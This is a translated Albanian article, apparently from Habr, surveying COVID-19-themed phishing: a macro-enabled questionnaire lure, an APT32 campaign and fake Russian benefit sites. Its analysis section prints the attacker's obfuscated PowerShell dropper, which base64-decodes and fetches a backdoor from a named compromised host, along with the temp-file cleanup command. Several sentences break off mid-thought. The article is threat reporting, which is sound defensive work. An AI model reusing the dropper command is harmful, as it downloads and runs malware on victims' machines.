Sulmuesit vazhdojnë të shfrytëzojnë temën e COVID-19, duke krijuar gjithnjë e më shumë kërcënime për përdoruesit që janë shumë të interesuar për gjithçka që lidhet me epideminë. NË
Mbani mend në
Dëshironi një test falas për COVID-19?
Një shembull tjetër domethënës i phishing me temën e koronavirusit ishte
Bindja e shumicës së përdoruesve për të aktivizuar makro ishte gjithashtu e lehtë. Për ta bërë këtë, u përdor një mashtrim standard: për të plotësuar pyetësorin, së pari duhet të aktivizoni makro, që do të thotë se duhet të ekzekutoni një skript VBA.
Siç mund ta shihni, skripti VBA është i maskuar posaçërisht nga antiviruset.
Windows ka një veçori pritjeje ku aplikacioni pret /T <sekonda> përpara se të pranojë përgjigjen e paracaktuar "Po". Në rastin tonë, skripti priti 65 sekonda përpara se të fshinte skedarët e përkohshëm:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Dhe gjatë pritjes, malware u shkarkua. Një skript i veçantë PowerShell u lançua për këtë:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Pas dekodimit të vlerës Base64, skripti PowerShell shkarkon prapavijën e vendosur në serverin e internetit të hakuar më parë nga Gjermania:
http://automatischer-staubsauger.com/feature/777777.png
dhe e ruan nën emrin:
C:UsersPublictmpdirfile1.exe
Dosje ‘C:UsersPublictmpdir’
fshihet kur ekzekutohet skedari 'tmps1.bat' që përmban komandën cmd /c mkdir ""C:UsersPublictmpdir"".
Sulm në shënjestër ndaj agjencive qeveritare
Për më tepër, analistët e FireEye raportuan së fundmi një sulm të synuar APT32 që synonte strukturat qeveritare në Wuhan, si dhe Ministrinë Kineze të Menaxhimit të Emergjencave. Një nga RTF-të e shpërndara përmbante një lidhje me një artikull të New York Times me titull
Është interesante se në kohën e zbulimit, asnjë nga antivirusët nuk e zbuloi këtë shembull, sipas Virustotal.
Kur faqet zyrtare të internetit nuk funksionojnë
Shembulli më i mrekullueshëm i një sulmi phishing ndodhi në Rusi vetëm një ditë tjetër. Arsyeja për këtë ishte caktimi i një përfitimi të shumëpritur për fëmijët e moshës 3 deri në 16 vjeç. Kur fillimi i pranimit të aplikacioneve u njoftua më 12 maj 2020, miliona njerëz nxituan në faqen e internetit të Shërbimeve Shtetërore për ndihmën e shumëpritur dhe rrëzuan portalin jo më keq se një sulm profesional DDoS. Kur presidenti tha se "Shërbimet qeveritare nuk mund të përballonin fluksin e aplikacioneve", njerëzit filluan të flisnin në internet për hapjen e një faqeje alternative për pranimin e aplikacioneve.
Problemi është se disa sajte filluan të punojnë në të njëjtën kohë, dhe ndërsa një, e vërteta në posobie16.gosuslugi.ru, pranon në të vërtetë aplikacionet, më shumë
Kolegët nga SearchInform gjetën rreth 30 domene të reja mashtruese në zonën .ru. Infosecurity dhe Softline Company kanë gjurmuar më shumë se 70 faqe interneti të ngjashme të falsifikuara të shërbimeve qeveritare që nga fillimi i prillit. Krijuesit e tyre manipulojnë simbole të njohura dhe përdorin gjithashtu kombinime të fjalëve gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, e kështu me radhë.
Hipe dhe inxhinieri sociale
Të gjithë këta shembuj vetëm konfirmojnë se sulmuesit po fitojnë para me sukses temën e koronavirusit. Dhe sa më i lartë tensioni social dhe çështjet më të paqarta, aq më shumë shanse kanë mashtruesit për të vjedhur të dhëna të rëndësishme, për t'i detyruar njerëzit të heqin dorë nga paratë e tyre ose thjesht të hakojnë më shumë kompjuterë.
Dhe duke pasur parasysh se pandemia ka detyruar njerëzit potencialisht të papërgatitur të punojnë nga shtëpia në masë, jo vetëm të dhënat personale, por edhe të korporatave janë në rrezik. Për shembull, kohët e fundit përdoruesit e Microsoft 365 (ish Office 365) iu nënshtruan gjithashtu një sulmi phishing. Njerëzit morën mesazhe masive zanore "të humbura" si bashkëngjitje të letrave. Sidoqoftë, skedarët ishin në të vërtetë një faqe HTML që dërgonte viktimat e sulmit
Burimi: www.habr.com